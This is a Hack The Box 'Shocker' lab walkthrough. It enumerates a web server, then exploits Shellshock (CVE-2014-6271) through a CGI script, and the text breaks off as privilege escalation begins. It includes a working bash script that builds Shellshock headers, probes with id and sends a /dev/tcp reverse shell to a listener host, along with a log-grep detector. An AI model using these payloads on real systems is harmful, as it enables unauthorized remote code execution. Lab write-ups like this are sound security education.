Hack The Box - Shocker Walkthrough without Metasploit
Shocker is a Linux box rated Easy. Using basic enumeration and a well-known Bash vulnerability we will get a foothold, and from there we will escalate privileges by abusing a privileged binary.
Shocker
Enumeration
First we run nmap (in our case through nmapAutomator.sh, a script that wraps nmap and some basic enumeration of the target). Two ports are open: 80 (HTTP) and 2222 (SSH on a non-standard port).
We then ran gobuster in dir mode with the options -u (URL), -w (wordlist) and -t (threads); since we are on a pentesting platform and not on a real engagement we can afford 40 threads.
Gobuster first try
We then tried another wordlist, this time big.txt from /usr/share/dirb/wordlists on our Kali machine. This time we found index.html and /cgi-bin/.
Gobuster cgi-bin found
Since we found a /cgi-bin/ folder we run gobuster against it again, this time with two new flags:
-x to indicate the file extensions to look for (for CGI, sh and pl are the obvious candidates)
-e to show the full URL of each result instead of just the path
Gobuster bash found
This output is really interesting: there is a shell script in /cgi-bin/, which means the web server executes it with Bash on every request, so we can attempt a Shellshock attack.
Exploitation
We are going to perform a Shellshock attack, CVE-2014-6271. This is a Bash vulnerability that allows unauthenticated remote code execution: a vulnerable Bash imports function definitions from environment variables and keeps executing whatever follows the function body. Windows itself does not ship Bash, so a plain Windows host is not affected, but a great percentage of the web runs on Apache servers, and the majority of those run on Linux (just like our victim). Apache's CGI handler copies request headers such as User-Agent into environment variables before it runs the script, which is exactly how an attacker-controlled value reaches Bash.
The string we send is () { :; }; and it is not random characters at all: it is an empty function definition. A vulnerable Bash sees an environment variable whose value starts with () { and parses it as a function; the bug is that it then continues parsing and executes whatever comes after the closing };.
So we put a Bash reverse shell after that prefix, start a listener on our machine, and whatever follows the function definition runs on the server.
With that in mind we send a curl request to the victim with the payload in a request header:
ShellShock CVE-2014-6271
ShellShock
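The full Shellshock workflow from the previous paragraphs, written out as an added example that is not code from the original walkthrough. The target address, the CGI path, and the listener address and port are placeholders I chose, not values taken from the page; the sample access log at the bottom is constructed. It covers the local sanity check for a vulnerable Bash, a harmless probe that runs id through the CGI (the Content-Type line and blank line are there so Apache gets a valid CGI header block instead of returning a 500), the reverse-shell variant, and the defender's view: the `() {` prefix lands verbatim in the logged User-Agent, so one fixed-string grep finds every attempt.

```bash
#!/usr/bin/env bash
# Added example, not code from the original walkthrough. TARGET, CGI_PATH,
# LHOST and LPORT are assumed placeholders; replace them with your own values.
set -u

TARGET="${TARGET:-10.10.10.56}"              # assumption: the box IP
CGI_PATH="${CGI_PATH:-/cgi-bin/script.sh}"   # assumption: the .sh gobuster found
LHOST="${LHOST:-10.10.14.2}"                 # assumption: attacker VPN address
LPORT="${LPORT:-4444}"                       # assumption: listener port

# 1. Local check: does this bash import a function from the environment and
#    keep executing what follows the closing brace? Prints vulnerable/patched.
local_bash_check() {
  if env x='() { :; }; echo VULNERABLE' bash -c 'true' 2>/dev/null | grep -q VULNERABLE; then
    echo vulnerable
  else
    echo patched
  fi
}

# 2. Build a Shellshock header value. It MUST start with "() {" so bash treats
#    it as an exported function; everything after "};" is the injected command.
shellshock_payload() {
  printf '() { :; }; %s' "$1"
}

# 3. Harmless probe: run /usr/bin/id through the CGI. Apache exports the
#    User-Agent header as HTTP_USER_AGENT, which is where bash picks it up.
probe_cgi() {
  curl -s -H "User-Agent: $(shellshock_payload 'echo Content-Type: text/plain; echo; /usr/bin/id')" \
    "http://${TARGET}${CGI_PATH}"
}

# 4. Reverse shell: run "nc -lvnp $LPORT" on LHOST first, then call this.
reverse_shell_payload() {
  shellshock_payload "/bin/bash -i >& /dev/tcp/$1/$2 0>&1"
}

send_reverse_shell() {
  curl -s -H "User-Agent: $(reverse_shell_payload "$LHOST" "$LPORT")" \
    "http://${TARGET}${CGI_PATH}" >/dev/null
}

# 5. Blue-team side: count Shellshock attempts in an Apache combined-format
#    access log. Fixed-string match, so the braces need no escaping.
count_shellshock_attempts() {
  grep -cF '() {' "$1"
}

# Constructed sample log (not captured from the box) for the detector above.
SAMPLE_LOG="$(mktemp)"
cat >"$SAMPLE_LOG" <<'EOF'
10.10.14.2 - - [01/Jan/2020:12:00:00 +0000] "GET /cgi-bin/script.sh HTTP/1.1" 200 40 "-" "() { :; }; /usr/bin/id"
10.10.14.2 - - [01/Jan/2020:12:00:05 +0000] "GET /index.html HTTP/1.1" 200 137 "-" "Mozilla/5.0"
10.10.14.2 - - [01/Jan/2020:12:00:09 +0000] "GET /cgi-bin/script.sh HTTP/1.1" 200 0 "-" "() { :; }; /bin/bash -i >& /dev/tcp/10.10.14.2/4444 0>&1"
EOF

if [ "${1:-}" = "run" ]; then   # only touch the network when explicitly asked
  echo "local bash: $(local_bash_check)"
  probe_cgi
fi
```

Run it as `./shellshock.sh run` to execute the local check and the id probe; call `send_reverse_shell` from a shell that has sourced the file once your listener is up. The probe is worth doing before the reverse shell because it confirms both that the script is executed by a vulnerable Bash and which user the CGI runs as.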
Privilege Escalation
Once inside we enumerate again, this time from within the box. Our very first command, sudo -l, which lists the commands the current user is allowed to run with sudo, already gives great results: